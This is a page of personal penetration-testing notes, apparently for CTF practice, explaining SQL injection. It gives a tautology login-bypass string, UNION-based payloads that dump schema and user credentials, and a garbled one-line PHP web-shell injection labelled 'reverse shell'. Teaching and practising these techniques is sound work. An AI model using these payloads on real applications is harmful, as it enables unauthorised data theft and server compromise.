🖍️
nullbrain
  • Intro
  • Tools
    • Preparation
  • basics/pre-req
    • Backpack
    • Linux
  • Working Tools
    • List of Note taking tools!
  • Practice Tools
    • Netcat
    • Socat
    • Powercat
    • PowerShell
  • Network Analysis Tools
    • Wireshark
    • Tcpdump
  • PRIVILEGE ESCALATION
    • Example
    • 🏁Kernel Exploits
    • 🪛Credentials
      • Reuse Passwords
      • Bash History
      • Local Database
  • Passive Information Gathering
    • Index
    • Tools
      • Recon-ng
        • Recon-ng [Usage]
      • Google Hacking DB [GHDB]
      • Whois
    • Techniques
      • Google Hacking
      • Website Recon
        • WR with Python
  • Active Information Gathering
    • Enumeration
      • NFS
      • SMB
    • Masscan
    • Nmap
    • Port Scanning
    • DNS
      • Scripts
      • Lookup
      • DNSRecon
      • DNSenum
  • Vulnerability Scanning
    • Vulnerability Scanning
    • Nmap
  • Web Application Exploit
    • Enumeration
      • Techniques
    • Tools
      • DIRB
  • Buffer Overflow
    • Memory
  • Real World!
    • Bruteforce
    • Tools
    • Enumeration
      • Enumeration MindMap
      • Tools
    • SQL Injection
    • Server-Side Template Injection
    • Hashcat
      • Hashcat options
    • Web Reconnaissance
    • Recon
    • Port Scanning
    • Privilege escalation
      • File permissions
      • Service Exploits
      • Kernel Exploits
      • Privilege Checker
      • snapd
      • SUID
      • Splunk
    • Reverse Shell
      • PHP deserialization
    • PHP
    • Exploits & Footholds
      • Exploit Mindmap
  • Checklist (CTF targetted)
    • checklist
  • Malicious payload
    • Metasploit APK
Powered by GitBook
On this page
  • Basic injection
  • GOTCHA
  • Exploit TIPS
  • Reverse shell
  • TIPS
  • GOOD READS
  1. Real World!

SQL Injection

Basic injection

1' or 1 = 1 #

  • 1': can be anything with ending quote

  • or : so we could write success query.

  • 1 = 1: so its always true

    • String would be quoted, 1 is integer so we dont quote

  • #: comment anything after this may be there in code

GOTCHA

  • order by: in order to understand field count.

  • limit 1: useful to bypass count === 1

Exploit TIPS

- Extracting Coloumns -> 1' union <SELECT QUERY> #
  - 1' UNION SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE tables_name = 'users' #
- Extracting Data -> 1' union <SELECT QUERY> #\
  - 1' union select 1, username, 3 from db.tables #
  - 1' union select 1, concat(field1, 0x3a, field2, 0x3a, field3), from db.tables #
    - filed1,2,3 could be likes of username, email, pass
    - 0x3a is hexcode for `:`

Reverse shell

  • union select 1, 2, '<?php system[$_GET]>

TIPS

- SQL query vs Web APP Query: this can mean if its vulnerable to sql injection or not.
- concept is same for any database engine but example works for mysql.

GOOD READS

PreviousToolsNextServer-Side Template Injection

Last updated 2 years ago

Portswinger Academy
pentest moneky Cheatsheet